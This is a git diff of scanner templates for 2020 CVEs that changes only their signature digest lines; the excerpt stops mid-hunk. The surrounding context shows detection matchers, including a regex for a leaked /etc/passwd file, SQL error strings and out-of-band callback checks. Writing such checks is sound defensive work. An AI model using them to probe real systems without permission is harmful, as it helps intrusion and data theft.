4b0a0048304602210083f16f101ac090f5d7e921131e73a027f6009fff40f89865c434db95593638b7022100a606966b55e981d57fde6523d60dc96e82d5cdc44a754742dac2b5268a081294:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201fa99af638c35821f64feec1eeb9f72c1e1c3cfabc1e1dca901f87a61a8160290221009c52db7f1fa2f35944f913d927e44976311c3424c70f0958cb7cc313bdc0827a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-28188.yaml b/http/cves/2020/CVE-2020-28188.yaml index cfd5a2452b..09bdbeb931 100644 --- a/http/cves/2020/CVE-2020-28188.yaml +++ b/http/cves/2020/CVE-2020-28188.yaml @@ -54,4 +54,4 @@ http: part: interactsh_request words: - "User-Agent: {{useragent}}" -# digest: 4a0a0047304502210085ac18d58b25cda6f18fb57df5ee204220cce67dfd2d614ea043b10b5987195b02200ac8512718ee39d10cc0baed51f32d199ac3e7ef8c366405aa49af3e971df93b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008753bfc0aaa2cfac772094b7526a43c03ae00319d48e9fb8501edc3defe9031d02200405f1f533dbfaeaaecd2e08cf2c008173e37db359a53e5b59a07c175ae4567c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-28208.yaml b/http/cves/2020/CVE-2020-28208.yaml index 76ca5cba57..d8cf3a3da9 100644 --- a/http/cves/2020/CVE-2020-28208.yaml +++ b/http/cves/2020/CVE-2020-28208.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022048dc7f2955a7c8165a805ab421aa67f77e3dbbf8babf696b4c0b85a3d615efcb0220385a7cfa496fb6ae1edfd40595f13672069e6ed62c0b12c3ecfd17a44eca5e72:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d6c7f2a1023bb8cf377fabfbbb4829f00d2a7a324a1f4559b5194b1efd41728d022061a65ea3ea14cd681975c01cb9ef4b911f1cc14e8257bf2298322a46ac77766f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-28871.yaml b/http/cves/2020/CVE-2020-28871.yaml index cbb4b49bd1..20fbd8c529 100644 --- a/http/cves/2020/CVE-2020-28871.yaml +++ b/http/cves/2020/CVE-2020-28871.yaml @@ -68,4 +68,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100d99bce4a30e181474d84ef417a6772ad649cef64e498eca647280f76e3aa0baf022100f3f1b147ebdb237cb4b2996e8381b65b8d62448c26388dce6c2d5d98a4096fe5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b39d0c69db45263931714ef86ba9b05e11117b87908d4c8601c8cd0d1c84c72002200a0396346a089b447831c1bc88819562f3c8f36ceb448c88a4fbe9b25608386b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-29164.yaml b/http/cves/2020/CVE-2020-29164.yaml index 19444ba22b..2b34ffa712 100644 --- a/http/cves/2020/CVE-2020-29164.yaml +++ b/http/cves/2020/CVE-2020-29164.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100eef3cee9242d0faa4d39283bfb69171f37df3516899ca083fcabad8c7f4cdcb70221008f958e6457bea7a1c342e6b6efc6c8e6a23e3e42c6f0a677925b842c310e06e6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ff0343063bc6bc3425ce7d844033dddb9b55a410a25236f5f1c13901f3464c61022100da2ca986d7243ef4b6f669ea2fda6c579087f9254f8d978059a5ae043f93c2a0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-29227.yaml b/http/cves/2020/CVE-2020-29227.yaml index 7fde469b2a..83c8576e2d 100644 --- a/http/cves/2020/CVE-2020-29227.yaml +++ b/http/cves/2020/CVE-2020-29227.yaml @@ -45,4 +45,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502210087e6438b7ef91ed9ace5b21965669d3e02629d42a780db4c203d43f6c7e9994102202503aaac6e263ea1eb468d45732cc06a390e660c0e0cf3c6656daf03a4773b3c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203cc2a005024db88784e43aee67a4df8d491936a6c510c86d525b3138904a5cd802203f6db67c09dd08363694a4436f3398785c26e75be24ce85e88dd82edb20b83d0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-29284.yaml b/http/cves/2020/CVE-2020-29284.yaml index d4742310cb..e086b0633b 100644 --- a/http/cves/2020/CVE-2020-29284.yaml +++ b/http/cves/2020/CVE-2020-29284.yaml @@ -52,4 +52,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022077b1c5498dae902e0ad7e7405b7d959c4faf796f270db4dc8ad70f78d13f8abd0221009a4e7d605a8b99d9957f179e9e090b48217d6acde1a09be14427c5a9ceadc952:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204a961e5e3dc591d1ed31952da38d3c4adda8a605b53182dd3cfaf34a4587adbd02204bc0a9fd3fd1d1cf9066837dfe68c9e2892868bd518817ec6fd744cfd35eaff1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-29395.yaml b/http/cves/2020/CVE-2020-29395.yaml index 69e589c909..3434eddbcb 100644 --- a/http/cves/2020/CVE-2020-29395.yaml +++ b/http/cves/2020/CVE-2020-29395.yaml @@ -66,4 +66,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402201a710f599e37ca84f4c5ce50b0de3c5b186ecb2e2cde5baa91a5c12c03034c4102204701cdfa4f09f39c53d5b5c108f3d652ba3f452608e7b4a10e86eb9f1b2cbf65:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100993a7e9ecefdc365e401fed26718a5ea7c473d5907d41afb8454c7a705c79365022005c1006a6349b16a557fb1ba985d7021bc8612d94e88e68a04dec75b39a90c7a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-29583.yaml b/http/cves/2020/CVE-2020-29583.yaml index 014ee1b3cb..d8c23bb270 100644 --- a/http/cves/2020/CVE-2020-29583.yaml +++ b/http/cves/2020/CVE-2020-29583.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402205064009da027752d122ecf0014ab308168a1bc00b4b71c52380ea84c25f8d24502207f9d7991e9122052d9ecf249bf0e2129e660d62d0a04ae025cd5e64b1d57619d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f683809abe7e85cb3a1175e77d284384bd3388b4ce037518577b11a1b99573dd02202b7395ca11974b5bdc4ce385c42281ae695c79b19c7d4b4fb12b108a532a8ebf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-3452.yaml b/http/cves/2020/CVE-2020-3452.yaml index 4705cb52ef..9bd5d4b457 100644 --- a/http/cves/2020/CVE-2020-3452.yaml +++ b/http/cves/2020/CVE-2020-3452.yaml @@ -44,4 +44,4 @@ http: - "INTERNAL_PASSWORD_ENABLED" - "CONF_VIRTUAL_KEYBOARD" condition: and -# digest: 4a0a004730450220083b1af8636250e0a465400427ebe39df44c1fd2fdafc0ab28ceac1ec21a2b6a022100ca085d560a8304af5d6162c1f37d3d62931dc1454d92c6003bff69c446ddc062:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100dd5c3435bffa71b4591359a06350a03e4b9f6ce811aae30dc0e94698ac9270a0022100d48d31ccdc552ae4840aa07a3a710b5f08a2e5b2736b0a7070c515442ed8ec4f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-35234.yaml b/http/cves/2020/CVE-2020-35234.yaml index 8ed3be85fa..01e33cf6bc 100644 --- a/http/cves/2020/CVE-2020-35234.yaml +++ b/http/cves/2020/CVE-2020-35234.yaml @@ -42,4 +42,4 @@ http: - "log" - "Index of" condition: and -# digest: 4a0a00473045022100b5b245278cf9f882c12ccd7f432d9ad044ce3e1d7d1040268987c3b0da6b38dc02206edf464d73fbe6176784b8e1f637bf87e468ab8a348d61afba6779c4abe0d4d7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502204afffb6d64aa4882aae9e0cf9cc281bb76021177859483ea797b53357f06e64f022100e33004b17c4e22b77183320977185babddce8f34d7688d5c4ba9419c3e1ea106:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-35338.yaml b/http/cves/2020/CVE-2020-35338.yaml index 4a58de3baa..ae9ee842a5 100644 --- a/http/cves/2020/CVE-2020-35338.yaml +++ b/http/cves/2020/CVE-2020-35338.yaml @@ -46,4 +46,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100d90bc7e3d71533f0575c136f4f13a6f7a419598ac09d57913c52d0239e3ac87d0221009ca68b1baddc88c46aaa979a70542106d8e7165c78038258ac7f35037066fee9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100bc50d4afe23ea33ae214e9a6ed2d16702561177aef949c0b88e96bf25b51558802200f9b1b62e778b927f3ffa9baa5c2ef58e43976a9a6b15a4e80a8111135652ccd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-35476.yaml b/http/cves/2020/CVE-2020-35476.yaml index dd892cf895..96155b7dcf 100644 --- a/http/cves/2020/CVE-2020-35476.yaml +++ b/http/cves/2020/CVE-2020-35476.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502205a5db837668619514abd4b5a118f7e041c8f574a24b94397925bfe86afa7e3b90221009e04fec147cf698f9d10617130be06ffd77f3b4b3e7e1f035ec980127c66bded:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f30e703a1e893ff7bfaa5878aa52127a107b8cca0b273efd668e19ad5510f28f022100c88a15ae1f91f2812f6b2533dfe5e1d2fe4589a54cb4e571b2be499397edb364:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-35489.yaml b/http/cves/2020/CVE-2020-35489.yaml index 175e774e0d..3e3b12c22b 100644 --- a/http/cves/2020/CVE-2020-35489.yaml +++ b/http/cves/2020/CVE-2020-35489.yaml @@ -64,4 +64,4 @@ http: group: 1 regex: - "(?m)Stable tag: ([0-9.]+)" -# digest: 4a0a0047304502200119d40e914be20d2c6e92899c0f92c4d47e25598a6a62e070775ac3598541ac022100f55d4088bdcb51738c6039670f2b8f9a5196c7f7458c1f9094355d76e42655ad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100af1f6a44be71df3c9a07f178f137fef959ed1244d618811085fce868ef3e24320220601198d66dbfd49b6055125af5efde33ea18ca71f7dee65a351b8bae690c152a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-35580.yaml b/http/cves/2020/CVE-2020-35580.yaml index a8c5341f0a..043a9ed9e3 100644 --- a/http/cves/2020/CVE-2020-35580.yaml +++ b/http/cves/2020/CVE-2020-35580.yaml @@ -39,4 +39,4 @@ http: part: body regex: - "root:.*:0:0:" -# digest: 4a0a0047304502201da11702e06331d8f8ff219e8bc69220f6171544ccfca6ecad9fef40ba169072022100fd26ae7a0963bb2a89e2e46906d37c053117091322cb077181667ab57e425b6d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022020f4ae20a8aaf732d50af366255c4a6a74698e1ea2066b89a865d5f04ab165a40220362b395455a12f623a963a4fcb5dd2415bb18ec0fc8133fa951323996e27531b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-35598.yaml b/http/cves/2020/CVE-2020-35598.yaml index 6501f849b1..ddff9485b7 100644 --- a/http/cves/2020/CVE-2020-35598.yaml +++ b/http/cves/2020/CVE-2020-35598.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100911e463b70d73004e8ef94a9baaac09e041d404c58da64317ee96c7588297ba00220192e115eb0658148208f16c7326d2bc2148e422ac20569cd1d135b81008c25f4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d6538734b8e31d59a4a247023a9d1e293d5375a02a2c5d5f17886d8c6b4b656402203136d4ab15fa023efb48df10c1cbdf0f852e905d08bbbf6717bcb6328f1aa6b7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-35713.yaml b/http/cves/2020/CVE-2020-35713.yaml index 1cbc6725b4..2da0dc127d 100644 --- a/http/cves/2020/CVE-2020-35713.yaml +++ b/http/cves/2020/CVE-2020-35713.yaml @@ -45,4 +45,4 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" -# digest: 4a0a00473045022075f0d76f377b911a20e32b13ad32f15eb5fb1e0fedbbe5b7660104f21d20d391022100f93eba91a2d924cd4d3530e6362549fdf26d23ebb303d135ddefc8da78e196a8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ee11fe056898e5fd350c49df1dd45943e21f32ee2e4e1a0e5ba8315b3a3c8de3022011191bcaebc6056b7f816437b0c9075fb5d3bd87a2be9c84daa45d5ae8c2596a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-35736.yaml b/http/cves/2020/CVE-2020-35736.yaml index 3c813132cc..c1928115d5 100644 --- a/http/cves/2020/CVE-2020-35736.yaml +++ b/http/cves/2020/CVE-2020-35736.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100908e8f49353459e425b78f84c48a3efbe2ecad152c2a624e2e70b0eeb7d03276022100d679f9d150a3e04b488914d12e3cc57b7c1c89f983a0adc5e35f4dc5310b70ac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100bbb2a8bf728c4c43291d2c61c2bd9d5199cb6948e78cee0b50ef9fe2fbf53d910221008bb0ab7b0858acf338ecefe99cd21ef1c5a6f604abbc02b1909964416040dea4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-3580.yaml b/http/cves/2020/CVE-2020-3580.yaml index 5f3bc76f8d..13b92965e6 100644 --- a/http/cves/2020/CVE-2020-3580.yaml +++ b/http/cves/2020/CVE-2020-3580.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100a22843600fa540dd4035057b8812dca1cabaf0cb179c022be93bcd61aa640a6702200ad6f005a0c0b15427d37ec3fbbb81e0edea63010d20973f1d3760735d993b11:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210084623c91c09a63d9e5040882329f1c8a8bfdddceefc995974de79d15d63b0f7c022100c9769e30d0acd487de81f5d069ff42bb5ad23850e07d7aef93ee001c2a098010:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-35846.yaml b/http/cves/2020/CVE-2020-35846.yaml index 176ff3534b..2b6dd3022a 100644 --- a/http/cves/2020/CVE-2020-35846.yaml +++ b/http/cves/2020/CVE-2020-35846.yaml @@ -61,4 +61,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022054a4c1c91d4dc2db65ddab6c58e5ce6ed8009e20d03a321ac03742dfdab22439022100917d48526b787d17f67533ad55a2b0e0d3264e2eb38c019d56255c6a244c707c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210094d40af2574756b83b158c132f40fc217f5a2f121bbd22db1e63491cae113a24022072c5efda1f80298814f7b07e23bcbfbc7c6ac9fda61fd2eca44f794c45da6f62:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-35847.yaml b/http/cves/2020/CVE-2020-35847.yaml index a1583675d8..99247dd76c 100644 --- a/http/cves/2020/CVE-2020-35847.yaml +++ b/http/cves/2020/CVE-2020-35847.yaml @@ -74,4 +74,4 @@ http: negative: true regex: - 'string\([0-9]{1,3}\)(\s)?"([A-Za-z0-9-.@\s-]+)"' -# digest: 4b0a00483046022100b22461d6f3fb20ee41694adc4d1a172d49954b2fd5e4ffe9b471b7245fc3ebe2022100cf54164abf938038a87d987cc754a82f7fb0325896c2bfe719cb9dd70c139aa1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f9321d3556d4f5143711903a0654ba7e342162a38e8ae25357f182c8009359b4022100b85321eaa826162b86ed187c90f7f9046462fc0837f9636752d1c933e5cab24e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-35848.yaml b/http/cves/2020/CVE-2020-35848.yaml index 9e3fd91d47..1dc59dd239 100644 --- a/http/cves/2020/CVE-2020-35848.yaml +++ b/http/cves/2020/CVE-2020-35848.yaml @@ -50,4 +50,4 @@ http: part: body regex: - 'string\([0-9]{1,3}\)(\s)?"rp-([a-f0-9-]+)"' -# digest: 4a0a0047304502204c5e621f8e72efbb78024a1d448302c1b840c428b84bd1d8c46c91a239f8fae40221008c5563e6e9537a8190b64c882918cb880fa670f4410e0ff17c0d132bd4ffb4ab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220160db8987fea4ba565870df9c6df758db6fa682ef92ff4c6f6432ad406cfe4e9022079f90c859e2f4df2a98a1c71be7f48d55b3aec47a393cd1b66068046c493e3d9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-35984.yaml b/http/cves/2020/CVE-2020-35984.yaml index d1a397b88b..3a639939c6 100644 --- a/http/cves/2020/CVE-2020-35984.yaml +++ b/http/cves/2020/CVE-2020-35984.yaml @@ -65,4 +65,4 @@ http: regex: - 'id="form_session_token" value="(.*)" type="hidden"' internal: true -# digest: 4b0a00483046022100c093406f2e20ab363ad2e5b2e58e612c32e582979f5b76239ee293f40c516cf3022100bc62dd62624a4844c2599ec0db7386bdb99d72bf47b9f60294a335e73d51f719:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a73c869d7f192cb950bb11e43d7567f883710efb18f98876e8e6ff53a23a65b302210091f30aa94c708f64f86578c8f17f01fe6a2524a57792e5c54ac10f750a025c23:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-35985.yaml b/http/cves/2020/CVE-2020-35985.yaml index 3413c23bbb..5e304db73d 100644 --- a/http/cves/2020/CVE-2020-35985.yaml +++ b/http/cves/2020/CVE-2020-35985.yaml @@ -66,4 +66,4 @@ http: regex: - 'id="form_session_token" value="(.*)" type="hidden"' internal: true -# digest: 4a0a0047304502201a053b9e5d1b3b39b3a63962bbb73e3bd1ae057df9bb6bbd8c70a1c54e5c889a022100dbfd8d43414776fb81d37e2acca5ce6f22a4a9ae227720b8a0c06c123a48656b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202d90c2eb84256f04b073de463cfb0402ec212dd03ace14707634a33145e8c7fc022100bb8e7cccf338be987caa5eb7b8f1e1ccdf1448480d085010259f5a8992f1d10d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-35986.yaml b/http/cves/2020/CVE-2020-35986.yaml index 85e049d8b4..93c123a943 100644 --- a/http/cves/2020/CVE-2020-35986.yaml +++ b/http/cves/2020/CVE-2020-35986.yaml @@ -65,4 +65,4 @@ http: regex: - 'id="form_session_token" value="(.*)" type="hidden"' internal: true -# digest: 490a00463044022001a1db1ce282848e286180a36258ba7a97e9ebcfd5e3bf04752665acd1be726002201be28513e9cf09e79f866ea38c6862b1004f5f20e60512c3903a76150fee9ca2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203865ecc2276affcc6cf8b20d87931b80f7d4bacf7b3d0aff843d100f41bd350202205425c03e757787dae5fd09c05e990376c87d4493772256ddbbf17b39e67ae53d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-35987.yaml b/http/cves/2020/CVE-2020-35987.yaml index d8c4ba738a..5896b0ef90 100644 --- a/http/cves/2020/CVE-2020-35987.yaml +++ b/http/cves/2020/CVE-2020-35987.yaml @@ -66,4 +66,4 @@ http: regex: - 'id="form_session_token" value="(.*)" type="hidden"' internal: true -# digest: 490a004630440220008f7be9d19095521ee732eedcd00db1cb6c0d5ce2bfc3285e09975ecfb877fd022006d98c7cde4454aff8c6e3c19f73f57edf1f276ad7caf1c2808c837efdfcf07e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ca59ace4655ae686646caa3a89197ba7eb18c07a8e640fbce32ecbe06a0702ca022100b9044a541d687ace797222bbea31c02a613a538f54ba347b15d306f0a1398a4f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-36112.yaml b/http/cves/2020/CVE-2020-36112.yaml index 46bb268528..f6f444031d 100644 --- a/http/cves/2020/CVE-2020-36112.yaml +++ b/http/cves/2020/CVE-2020-36112.yaml @@ -40,4 +40,4 @@ http: - "get book price failed! You have an error in your SQL syntax" - "Can't retrieve data You have an error in your SQL syntax" condition: or -# digest: 4a0a0047304502206fa2676792b348fc60ebc9cc70b869fe76ef0386dc78c9e96e3249d4a5cfbc370221008c90f9a9894fb5a251d8ebb984a710b6c11de3f64f43f866135bca21ff6b735e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203616fb072b4db2eab9fa478e6dc3f3035f1206cc86adce846dac33d3aca8ec86022007f79e0e1a6b2c0165aeae26da3dc9bd658a410613cfbae403f02293e8cb4c09:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-36289.yaml b/http/cves/2020/CVE-2020-36289.yaml index c92d50c413..ded36677e7 100644 --- a/http/cves/2020/CVE-2020-36289.yaml +++ b/http/cves/2020/CVE-2020-36289.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100898e394070c92c7a02d36dcfc81e5aab7fa675d1b34ee54ef3f7b0695240db83022100dc4514faa3631043b8720e95822353c897a7fd577c593cf8dac8ee1b12e9e20e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100af70577f267e104380db55128d0e69ec65ffb66e5ec2f85a739c7a661adca17a022100a9dd1bd32a93502c58e0a70e137b8e74b72c3e59922e90aa166862167a52e257:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-36365.yaml b/http/cves/2020/CVE-2020-36365.yaml index cf8a6981ad..5be9a529b5 100644 --- a/http/cves/2020/CVE-2020-36365.yaml +++ b/http/cves/2020/CVE-2020-36365.yaml @@ -41,4 +41,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# digest: 4b0a004830460221009a56af69b3c21b9fa51cb0f1ce2fc157d3bdc58bb721e709177dc38621b0de1c022100d1822d3b7e4d326ee387d0080c3efa1014d7db6936cdb908a687e0412facc9a1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c39683f83023c2b9b00bc9874ba82f944bb039fd360bd6fb76fa63047038f42302204fadc0b7522f212e1fc2076ac001586a47839a2ae87152a62ae2d8284f7d39f1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-4463.yaml b/http/cves/2020/CVE-2020-4463.yaml index e9c731ee45..6590ab0406 100644 --- a/http/cves/2020/CVE-2020-4463.yaml +++ b/http/cves/2020/CVE-2020-4463.yaml @@ -62,4 +62,4 @@ http: part: header words: - "application/xml" -# digest: 4b0a00483046022100d058bbbb18f9fcaf0793777079b5c78305acfdad26be6dd11135dfa666fb92b60221009914324daf438c22b331865eda5e672cc52bc7a691d94bca7a4eb59450bc5a3e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ad901c9f50112ffefc10b1c2aea6d266d683320f67f505e6fdfa319e2cadf9320220653da19c0b99e8e9f168a04d16913bd909cd86c04ee31bf7f1615f9a02fca76d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-5191.yaml b/http/cves/2020/CVE-2020-5191.yaml index 059e084422..5be55ab58a 100644 --- a/http/cves/2020/CVE-2020-5191.yaml +++ b/http/cves/2020/CVE-2020-5191.yaml @@ -66,4 +66,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220124a1449183f188b35b4f719c2326afa6646b898b1e01eba50c58b774045f986022100e740bb911aae6f4d5a6af96139596c6f0e7b0ae853d6d324a26b44037b0863c1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b9404523326339c17c3ff71746265c334d58e211cc335c15fa895b7d6613e1e70220766d0544c32d0e7505acadaeda515a40c27c809b20e054a1b359ac3839c6ae8b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-5192.yaml b/http/cves/2020/CVE-2020-5192.yaml index d9eb58a539..28214a9c38 100644 --- a/http/cves/2020/CVE-2020-5192.yaml +++ b/http/cves/2020/CVE-2020-5192.yaml @@ -63,4 +63,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100916c7a42d0436fc82b9ac530b4662f02687d7d10be9fd214377e261678aa6844022100f4a16d34647bc967921196ede47cf60acaa958982be7b443d8c1a0548c515288:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201d424f2cf825c04dfaf33f4494b47f051148733c2d41705fd3f9b4e2189cd9f0022100a3204a405b34dce8565e1805a20246458e6d8269cbf706a83a8bf55857661418:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-5284.yaml b/http/cves/2020/CVE-2020-5284.yaml index 9d5fec6868..85a67310e5 100644 --- a/http/cves/2020/CVE-2020-5284.yaml +++ b/http/cves/2020/CVE-2020-5284.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100cf159e65f362247e3e0a65e83c53300c9520bdf1e380765a8409fa22e623af0d02204351e223719946f992f804a11e35bf15d60a75603f57f242a0aab437fb152249:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220700626d55f9bb10f64ca0f2d9865a1ed336dd837623298826e4f8959c58b3490022027fa6ac15236194524116e922845bf213e3e8f270aaadc5e3df4d0f7575136cb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-5410.yaml b/http/cves/2020/CVE-2020-5410.yaml index 355108be0b..a234779ff3 100644 --- a/http/cves/2020/CVE-2020-5410.yaml +++ b/http/cves/2020/CVE-2020-5410.yaml @@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402203db5df7db50e8b1055bb3e76398c0b5656934012adbb9f23a1944b9a36c2754702202109a44766e5fa3aa588f6b3ace938919f8f64a947884f0db7d32f7ed22327f9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022063f5622a1b04083c7795b0121652061d45b91d971b5658d34f473c49a1eddedd022100cdbca03b4ddc7a090fe79cacab288901f028083051dce67b628525100cf58276:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-5777.yaml b/http/cves/2020/CVE-2020-5777.yaml index 9398930aac..23c5cf6e86 100644 --- a/http/cves/2020/CVE-2020-5777.yaml +++ b/http/cves/2020/CVE-2020-5777.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 503 -# digest: 4a0a0047304502205820aaf2c8d68c763616b3a1f2410b79857f447e47178528d8734e381ebdfa5702210083e2d7d81bc04ccc7035150e82144ebe4423dec3ae46947f57415373d7131908:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022041ff8b68e61b4f6bf7f2e768c1fb707a2132aebda523bc60105810042e08a3cf02203541d27a3b548e1ee2d44b7575b006fd03992db6c1028171e66404472cb9d4fd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-5902.yaml b/http/cves/2020/CVE-2020-5902.yaml index 54a16b4abc..b26d0b6feb 100644 --- a/http/cves/2020/CVE-2020-5902.yaml +++ b/http/cves/2020/CVE-2020-5902.yaml @@ -92,4 +92,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100aaf96da5a395053ea0372436ce504a37792ef36260bedf3723f869204d02cba902210083fd967a9f70ee938de4df948e3283c15e48c9e808d5cb0cc4e2dcbf1be556a6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100908ee0877da898c6bd05edac84afbf197f2bd3c652c05de81d682444c91705ac02202f6c10ec85dccbe5220c9db3ccced25575fd4a6c5aa0acd2e6aaa72ddbcdcb63:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-6171.yaml b/http/cves/2020/CVE-2020-6171.yaml index 0ac3638945..e14c0ca7f5 100644 --- a/http/cves/2020/CVE-2020-6171.yaml +++ b/http/cves/2020/CVE-2020-6171.yaml @@ 